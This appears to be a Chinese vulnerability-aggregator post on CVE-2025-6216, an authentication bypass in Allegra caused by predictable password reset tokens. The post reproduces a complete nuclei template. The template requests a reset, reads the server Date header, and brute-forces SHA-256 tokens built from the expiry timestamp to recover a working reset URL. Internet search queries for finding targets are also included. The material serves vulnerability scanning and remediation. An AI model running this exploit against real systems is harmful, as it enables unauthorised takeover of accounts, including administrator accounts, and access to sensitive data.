Allegra Authentication Bypass via Predictable Password Reset Token

漏洞信息

漏洞名称: Allegra Authentication Bypass via Predictable Password Reset Token

漏洞编号:

  • CVE: CVE-2025-6216

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: Allegra是一款广泛使用的应用程序,主要用于企业级服务中,提供密码恢复等功能。由于其广泛的应用,该漏洞的影响范围较大。该漏洞存在于密码恢复机制中,具体问题在于生成密码重置令牌时依赖于可预测的值。这种设计缺陷使得攻击者能够预测重置令牌,从而绕过身份验证。技术根源在于密码重置令牌的生成算法缺乏足够的随机性,导致令牌可被预测。这种漏洞允许远程攻击者在不需要身份验证的情况下,通过预测密码重置令牌来绕过身份验证机制,进而获得未授权访问权限。攻击者利用此漏洞可以访问敏感数据,甚至完全控制系统,对系统完整性和数据安全构成严重威胁。由于攻击不需要用户交互或认证,因此可以自动化执行,增加了被利用的风险。

产品厂商: alltena

产品名称: Allegra

影响版本: *

搜索语法: http.favicon.hash:”284403119” OR icon_hash=”284403119”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/166fb0dcd25baf3a330fdd73002efcd242a23988/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com"  # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
            import requests
            import hashlib,os
            import time
            from datetime import datetime, timezone
            from email.utils import parsedate_to_datetime

            def get_server_time(response):
                date_header = response.headers.get('Date')
                if date_header:
                    return parsedate_to_datetime(date_header)
                return None

            def main():
                BASE_URL = os.getenv("BaseURL")
                EMAIL = os.getenv("email")
                date_header = os.getenv("date_header")
                server_time = parsedate_to_datetime(date_header)
                if not server_time:
                    return
                server_time_ms = int(server_time.timestamp() * 1000)
                expiry_time_ms = server_time_ms + 28800000
                base_expiry_sec = (expiry_time_ms // 1000) * 1000
                for ms in range(1000):
                    candidate_expiry_ms = base_expiry_sec + ms
                    token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
                    test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
                    r = requests.get(test_url, allow_redirects=False)
                    if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                        print(test_url)
                        return

            if __name__ == "__main__":
                main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl  # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 4b0a00483046022100d59748595f6cc13b789b45b1b70fa7456e85389d00ebade00416bc13322030ae022100fdc0a9151f91f606b9f69221833d79ca5cbe89c2eb8d1da315759fa149b5f350:f54de283b4eb358da492cc866d2be612


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
Allegra Authentication Bypass via Predictable Password Reset Token
http://example.com/2025/07/12/github_1935153627/
作者
lianccc
发布于
2025年7月12日
许可协议